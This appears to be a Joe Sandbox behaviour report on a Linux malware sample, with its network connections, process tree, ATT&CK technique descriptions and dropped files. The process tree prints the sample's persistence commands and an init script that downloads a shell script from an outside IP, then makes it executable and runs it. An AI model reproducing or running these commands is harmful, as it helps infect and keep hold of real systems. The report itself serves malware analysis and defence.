Nov 24, 2024 04:17:57.980967999 CET	38992	199	192.168.2.23	154.216.19.139
Nov 24, 2024 04:17:58.154098988 CET	199	38994	154.216.19.139	192.168.2.23
Nov 24, 2024 04:17:58.154525995 CET	38994	199	192.168.2.23	154.216.19.139
Nov 24, 2024 04:17:59.361504078 CET	42836	443	192.168.2.23	91.189.91.43
Nov 24, 2024 04:18:00.129343987 CET	42516	80	192.168.2.23	109.202.202.202
Nov 24, 2024 04:18:14.207484961 CET	43928	443	192.168.2.23	91.189.91.42
Nov 24, 2024 04:18:26.493655920 CET	42836	443	192.168.2.23	91.189.91.43
Nov 24, 2024 04:18:30.589135885 CET	42516	80	192.168.2.23	109.202.202.202
Nov 24, 2024 04:18:55.161760092 CET	43928	443	192.168.2.23	91.189.91.42

System Behavior

Analysis Process: m68k.nn.elf PID: 6232, Parent PID: 6158

General

Start time (UTC):	03:17:53
Start date (UTC):	24/11/2024
Path:	/tmp/m68k.nn.elf
Arguments:	/tmp/m68k.nn.elf
File size:	4463432 bytes
MD5 hash:	cd177594338c77b895ae27c33f8f86cc

Chronological Activities

Analysis Process: m68k.nn.elf PID: 6249, Parent PID: 6232

General

Start time (UTC):	03:17:53
Start date (UTC):	24/11/2024
Path:	/tmp/m68k.nn.elf
Arguments:	-
File size:	4463432 bytes
MD5 hash:	cd177594338c77b895ae27c33f8f86cc

Chronological Activities

Analysis Process: m68k.nn.elf PID: 6271, Parent PID: 6232

General

Start time (UTC):	03:17:53
Start date (UTC):	24/11/2024
Path:	/tmp/m68k.nn.elf
Arguments:	-
File size:	4463432 bytes
MD5 hash:	cd177594338c77b895ae27c33f8f86cc

Chronological Activities

Analysis Process: sh PID: 6271, Parent PID: 6232

General

Start time (UTC):	03:17:53
Start date (UTC):	24/11/2024
Path:	/bin/sh
Arguments:	sh -c "systemctl enable custom.service >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 6276, Parent PID: 6271

General

Start time (UTC):	03:17:53
Start date (UTC):	24/11/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: systemctl PID: 6276, Parent PID: 6271

General

Start time (UTC):	03:17:53
Start date (UTC):	24/11/2024
Path:	/usr/bin/systemctl
Arguments:	systemctl enable custom.service
File size:	996584 bytes
MD5 hash:	4deddfb6741481f68aeac522cc26ff4b

Chronological Activities

Analysis Process: m68k.nn.elf PID: 6314, Parent PID: 6232

General

Start time (UTC):	03:17:53
Start date (UTC):	24/11/2024
Path:	/tmp/m68k.nn.elf
Arguments:	-
File size:	4463432 bytes
MD5 hash:	cd177594338c77b895ae27c33f8f86cc

Chronological Activities

Analysis Process: sh PID: 6314, Parent PID: 6232

General

Start time (UTC):	03:17:53
Start date (UTC):	24/11/2024
Path:	/bin/sh
Arguments:	sh -c "chmod +x /etc/init.d/system >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 6316, Parent PID: 6314

General

Start time (UTC):	03:17:53
Start date (UTC):	24/11/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: chmod PID: 6316, Parent PID: 6314

General

Start time (UTC):	03:17:53
Start date (UTC):	24/11/2024
Path:	/usr/bin/chmod
Arguments:	chmod +x /etc/init.d/system
File size:	63864 bytes
MD5 hash:	739483b900c045ae1374d6f53a86a279

Chronological Activities

Analysis Process: m68k.nn.elf PID: 6317, Parent PID: 6232

General

Start time (UTC):	03:17:53
Start date (UTC):	24/11/2024
Path:	/tmp/m68k.nn.elf
Arguments:	-
File size:	4463432 bytes
MD5 hash:	cd177594338c77b895ae27c33f8f86cc

Chronological Activities

Analysis Process: sh PID: 6317, Parent PID: 6232

General

Start time (UTC):	03:17:54
Start date (UTC):	24/11/2024
Path:	/bin/sh
Arguments:	sh -c "ln -s /etc/init.d/system /etc/rcS.d/S99system >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 6328, Parent PID: 6317

General

Start time (UTC):	03:17:54
Start date (UTC):	24/11/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: ln PID: 6328, Parent PID: 6317

General

Start time (UTC):	03:17:54
Start date (UTC):	24/11/2024
Path:	/usr/bin/ln
Arguments:	ln -s /etc/init.d/system /etc/rcS.d/S99system
File size:	76160 bytes
MD5 hash:	e933cf05571f62c0157d4e2dfcaea282

Chronological Activities

Analysis Process: m68k.nn.elf PID: 6330, Parent PID: 6232

General

Start time (UTC):	03:17:54
Start date (UTC):	24/11/2024
Path:	/tmp/m68k.nn.elf
Arguments:	-
File size:	4463432 bytes
MD5 hash:	cd177594338c77b895ae27c33f8f86cc

Chronological Activities

Analysis Process: sh PID: 6330, Parent PID: 6232

General

Start time (UTC):	03:17:54
Start date (UTC):	24/11/2024
Path:	/bin/sh
Arguments:	sh -c "echo \"#!/bin/sh\n# /etc/init.d/m68k.nn.elf\n\ncase \\\"$1\\\" in\n start)\n echo 'Starting m68k.nn.elf'\n /tmp/m68k.nn.elf &\n wget http://193.143.1.70/ -O /tmp/lol.sh\n chmod +x /tmp/lol.sh\n /tmp/lol.sh &\n ;;\n stop)\n echo 'Stopping m68k.nn.elf'\n killall m68k.nn.elf\n ;;\n restart)\n $0 stop\n $0 start\n ;;\n *)\n echo \\\"Usage: $0 {start\|stop\|restart}\\\"\n exit 1\n ;;\nesac\nexit 0\" > /etc/init.d/m68k.nn.elf"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: m68k.nn.elf PID: 6336, Parent PID: 6232

General

Start time (UTC):	03:17:54
Start date (UTC):	24/11/2024
Path:	/tmp/m68k.nn.elf
Arguments:	-
File size:	4463432 bytes
MD5 hash:	cd177594338c77b895ae27c33f8f86cc

Chronological Activities

Analysis Process: sh PID: 6336, Parent PID: 6232

General

Start time (UTC):	03:17:54
Start date (UTC):	24/11/2024
Path:	/bin/sh
Arguments:	sh -c "chmod +x /etc/init.d/m68k.nn.elf >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 6338, Parent PID: 6336

General

Start time (UTC):	03:17:54
Start date (UTC):	24/11/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: chmod PID: 6338, Parent PID: 6336

General

Start time (UTC):	03:17:54
Start date (UTC):	24/11/2024
Path:	/usr/bin/chmod
Arguments:	chmod +x /etc/init.d/m68k.nn.elf
File size:	63864 bytes
MD5 hash:	739483b900c045ae1374d6f53a86a279

Chronological Activities

Analysis Process: m68k.nn.elf PID: 6339, Parent PID: 6232

General

Start time (UTC):	03:17:54
Start date (UTC):	24/11/2024
Path:	/tmp/m68k.nn.elf
Arguments:	-
File size:	4463432 bytes
MD5 hash:	cd177594338c77b895ae27c33f8f86cc

Chronological Activities

Analysis Process: sh PID: 6339, Parent PID: 6232

General

Start time (UTC):	03:17:54
Start date (UTC):	24/11/2024
Path:	/bin/sh
Arguments:	sh -c "mkdir -p /etc/rc.d >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 6344, Parent PID: 6339

General

Start time (UTC):	03:17:54
Start date (UTC):	24/11/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: mkdir PID: 6344, Parent PID: 6339

General

Start time (UTC):	03:17:54
Start date (UTC):	24/11/2024
Path:	/usr/bin/mkdir
Arguments:	mkdir -p /etc/rc.d
File size:	88408 bytes
MD5 hash:	088c9d1df5a28ed16c726eca15964cb7

Chronological Activities

Analysis Process: m68k.nn.elf PID: 6345, Parent PID: 6232

General

Start time (UTC):	03:17:54
Start date (UTC):	24/11/2024
Path:	/tmp/m68k.nn.elf
Arguments:	-
File size:	4463432 bytes
MD5 hash:	cd177594338c77b895ae27c33f8f86cc

Chronological Activities

Analysis Process: sh PID: 6345, Parent PID: 6232

General

Start time (UTC):	03:17:54
Start date (UTC):	24/11/2024
Path:	/bin/sh
Arguments:	sh -c "ln -s /etc/init.d/m68k.nn.elf /etc/rc.d/S99m68k.nn.elf >/dev/null 2>&1"
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: sh PID: 6350, Parent PID: 6345

General

Start time (UTC):	03:17:54
Start date (UTC):	24/11/2024
Path:	/bin/sh
Arguments:	-
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: ln PID: 6350, Parent PID: 6345

General

Start time (UTC):	03:17:54
Start date (UTC):	24/11/2024
Path:	/usr/bin/ln
Arguments:	ln -s /etc/init.d/m68k.nn.elf /etc/rc.d/S99m68k.nn.elf
File size:	76160 bytes
MD5 hash:	e933cf05571f62c0157d4e2dfcaea282

Chronological Activities

Analysis Process: m68k.nn.elf PID: 6351, Parent PID: 6232

General

Start time (UTC):	03:17:54
Start date (UTC):	24/11/2024
Path:	/tmp/m68k.nn.elf
Arguments:	-
File size:	4463432 bytes
MD5 hash:	cd177594338c77b895ae27c33f8f86cc

Chronological Activities

Analysis Process: udisksd PID: 6244, Parent PID: 799

General

Start time (UTC):	03:17:53
Start date (UTC):	24/11/2024
Path:	/usr/lib/udisks2/udisksd
Arguments:	-
File size:	483056 bytes
MD5 hash:	1d7ae439cc3d82fa6b127671ce037a24

Chronological Activities

Analysis Process: dumpe2fs PID: 6244, Parent PID: 799

General

Start time (UTC):	03:17:53
Start date (UTC):	24/11/2024
Path:	/usr/sbin/dumpe2fs
Arguments:	dumpe2fs -h /dev/dm-0
File size:	31112 bytes
MD5 hash:	5c66f7d8f7681a40562cf049ad4b72b4

Chronological Activities

Analysis Process: udisksd PID: 6278, Parent PID: 799

General

Start time (UTC):	03:17:53
Start date (UTC):	24/11/2024
Path:	/usr/lib/udisks2/udisksd
Arguments:	-
File size:	483056 bytes
MD5 hash:	1d7ae439cc3d82fa6b127671ce037a24

Chronological Activities

Analysis Process: dumpe2fs PID: 6278, Parent PID: 799

General

Start time (UTC):	03:17:53
Start date (UTC):	24/11/2024
Path:	/usr/sbin/dumpe2fs
Arguments:	dumpe2fs -h /dev/dm-0
File size:	31112 bytes
MD5 hash:	5c66f7d8f7681a40562cf049ad4b72b4

Chronological Activities

Analysis Process: systemd PID: 6286, Parent PID: 6285

General

Start time (UTC):	03:17:53
Start date (UTC):	24/11/2024
Path:	/usr/lib/systemd/systemd
Arguments:	-
File size:	1620224 bytes
MD5 hash:	9b2bec7092a40488108543f9334aab75

Chronological Activities

Analysis Process: snapd-env-generator PID: 6286, Parent PID: 6285

General

Start time (UTC):	03:17:53
Start date (UTC):	24/11/2024
Path:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
Arguments:	/usr/lib/systemd/system-environment-generators/snapd-env-generator
File size:	22760 bytes
MD5 hash:	3633b075f40283ec938a2a6a89671b0e

Chronological Activities

Analysis Process: gnome-session-binary PID: 6293, Parent PID: 1477

General

Start time (UTC):	03:17:53
Start date (UTC):	24/11/2024
Path:	/usr/libexec/gnome-session-binary
Arguments:	-
File size:	334664 bytes
MD5 hash:	d9b90be4f7db60cb3c2d3da6a1d31bfb

Chronological Activities

Analysis Process: sh PID: 6293, Parent PID: 1477

General

Start time (UTC):	03:17:53
Start date (UTC):	24/11/2024
Path:	/bin/sh
Arguments:	/bin/sh -e -u -c "export GIO_LAUNCHED_DESKTOP_FILE_PID=$$; exec \"$@\"" sh /usr/libexec/gsd-housekeeping
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: gsd-housekeeping PID: 6293, Parent PID: 1477

General

Start time (UTC):	03:17:53
Start date (UTC):	24/11/2024
Path:	/usr/libexec/gsd-housekeeping
Arguments:	/usr/libexec/gsd-housekeeping
File size:	51840 bytes
MD5 hash:	b55f3394a84976ddb92a2915e5d76914

Chronological Activities

Analysis Process: gdm3 PID: 6319, Parent PID: 1320

General

Start time (UTC):	03:17:54
Start date (UTC):	24/11/2024
Path:	/usr/sbin/gdm3
Arguments:	-
File size:	453296 bytes
MD5 hash:	2492e2d8d34f9377e3e530a61a15674f

Chronological Activities

Analysis Process: Default PID: 6319, Parent PID: 1320

General

Start time (UTC):	03:17:54
Start date (UTC):	24/11/2024
Path:	/etc/gdm3/PrimeOff/Default
Arguments:	/etc/gdm3/PrimeOff/Default
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: gdm3 PID: 6329, Parent PID: 1320

General

Start time (UTC):	03:17:54
Start date (UTC):	24/11/2024
Path:	/usr/sbin/gdm3
Arguments:	-
File size:	453296 bytes
MD5 hash:	2492e2d8d34f9377e3e530a61a15674f

Chronological Activities

Analysis Process: Default PID: 6329, Parent PID: 1320

General

Start time (UTC):	03:17:54
Start date (UTC):	24/11/2024
Path:	/etc/gdm3/PrimeOff/Default
Arguments:	/etc/gdm3/PrimeOff/Default
File size:	129816 bytes
MD5 hash:	1e6b1c887c59a315edb7eb9a315fc84c

Chronological Activities

Analysis Process: udisksd PID: 6359, Parent PID: 799

General

Start time (UTC):	03:17:54
Start date (UTC):	24/11/2024
Path:	/usr/lib/udisks2/udisksd
Arguments:	-
File size:	483056 bytes
MD5 hash:	1d7ae439cc3d82fa6b127671ce037a24

Chronological Activities

Analysis Process: dumpe2fs PID: 6359, Parent PID: 799

General

Start time (UTC):	03:17:54
Start date (UTC):	24/11/2024
Path:	/usr/sbin/dumpe2fs
Arguments:	dumpe2fs -h /dev/dm-0
File size:	31112 bytes
MD5 hash:	5c66f7d8f7681a40562cf049ad4b72b4

Chronological Activities

Analysis Process: udisksd PID: 6408, Parent PID: 799

General

Start time (UTC):	03:17:55
Start date (UTC):	24/11/2024
Path:	/usr/lib/udisks2/udisksd
Arguments:	-
File size:	483056 bytes
MD5 hash:	1d7ae439cc3d82fa6b127671ce037a24

Chronological Activities

Analysis Process: dumpe2fs PID: 6408, Parent PID: 799

General

Start time (UTC):	03:17:55
Start date (UTC):	24/11/2024
Path:	/usr/sbin/dumpe2fs
Arguments:	dumpe2fs -h /dev/dm-0
File size:	31112 bytes
MD5 hash:	5c66f7d8f7681a40562cf049ad4b72b4

Chronological Activities

Analysis Process: udisksd PID: 6409, Parent PID: 799

General

Start time (UTC):	03:17:55
Start date (UTC):	24/11/2024
Path:	/usr/lib/udisks2/udisksd
Arguments:	-
File size:	483056 bytes
MD5 hash:	1d7ae439cc3d82fa6b127671ce037a24

Chronological Activities

Analysis Process: dumpe2fs PID: 6409, Parent PID: 799

General

Start time (UTC):	03:17:55
Start date (UTC):	24/11/2024
Path:	/usr/sbin/dumpe2fs
Arguments:	dumpe2fs -h /dev/dm-0
File size:	31112 bytes
MD5 hash:	5c66f7d8f7681a40562cf049ad4b72b4

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may establish persistence through executing malicious commands triggered by a user’s shell. User Unix Shell s execute several configuration scripts at different points throughout the session based on events. For example, when a user opens a command-line interface or remotely logs in (such as via SSH) a login shell is initiated. The login shell executes scripts from the system ( `/etc` ) and the user’s home directory ( `~/` ) to configure the environment. All login shells on a system use /etc/profile when initiated. These configuration scripts run at the permission level of their directory and are often used to set environment variables, create aliases, and customize the user’s environment. When the shell exits or terminates, additional shell scripts are executed to ensure the shell exits appropriately.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation
Platforms:	Linux, macOS
Url:	Open detailed description by Mitre

Description:	Adversaries may create or modify systemd services to repeatedly execute malicious payloads as part of persistence. Systemd is a system and service manager commonly used for managing background daemon processes (also known as services) and other system resources.Systemd is the default initialization (init) system on many Linux distributions replacing legacy init systems, including SysVinit and Upstart, while remaining backwards compatible.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Creation, File: File Modification, Process: Process Creation, Service: Service Creation, Service: Service Modification
Platforms:	Linux
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file or directory permissions/attributes to evade access control lists (ACLs) and access protected files.File and directory permissions are commonly managed by ACLs configured by the file or directory owner, or users with the appropriate permissions. File and directory ACL implementations vary by platform, but generally explicitly designate which users or groups can perform which actions (read, write, execute, etc.).
Tactics:	Defense Evasion
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, File: File Metadata, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may insert, delete, or manipulate data in order to influence external outcomes or hide activity, thus threatening the integrity of the data. By manipulating data, adversaries may attempt to affect a business process, organizational understanding, or decision making.
Tactics:	Impact
Data Sources:	File: File Creation, File: File Deletion, File: File Metadata, File: File Modification, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Linux Analysis Report m68k.nn.elf

Overview

General Information

Detection

Signatures

Classification

General Information

Runtime Messages

Process Tree

Malware Threat Intel

Yara Signatures

Initial Sample

Memory Dumps

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Spreading

Networking

System Summary

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Malware Configuration

Behavior Graph

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Domains

URLs

Domains and IPs

Contacted Domains

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

/boot/bootcmd

/etc/init.d/m68k.nn.elf

/etc/init.d/system

/etc/inittab

/etc/motd

/etc/profile

/etc/rc.local

/etc/systemd/system/custom.service

/memfd:snapd-env-generator (deleted)

/run/user/127/dconf/user

/tmp/qemu-open.bKy4Gs (deleted)

Static File Info

General

Static ELF Info

ELF header

Sections

Program Segments

Network Behavior

Network Port Distribution

TCP Packets

System Behavior

Analysis Process: m68k.nn.elf PID: 6232, Parent PID: 6158

General

Chronological Activities

Analysis Process: m68k.nn.elf PID: 6249, Parent PID: 6232

General

Chronological Activities

Analysis Process: m68k.nn.elf PID: 6271, Parent PID: 6232

General

Linux Analysis Report
m68k.nn.elf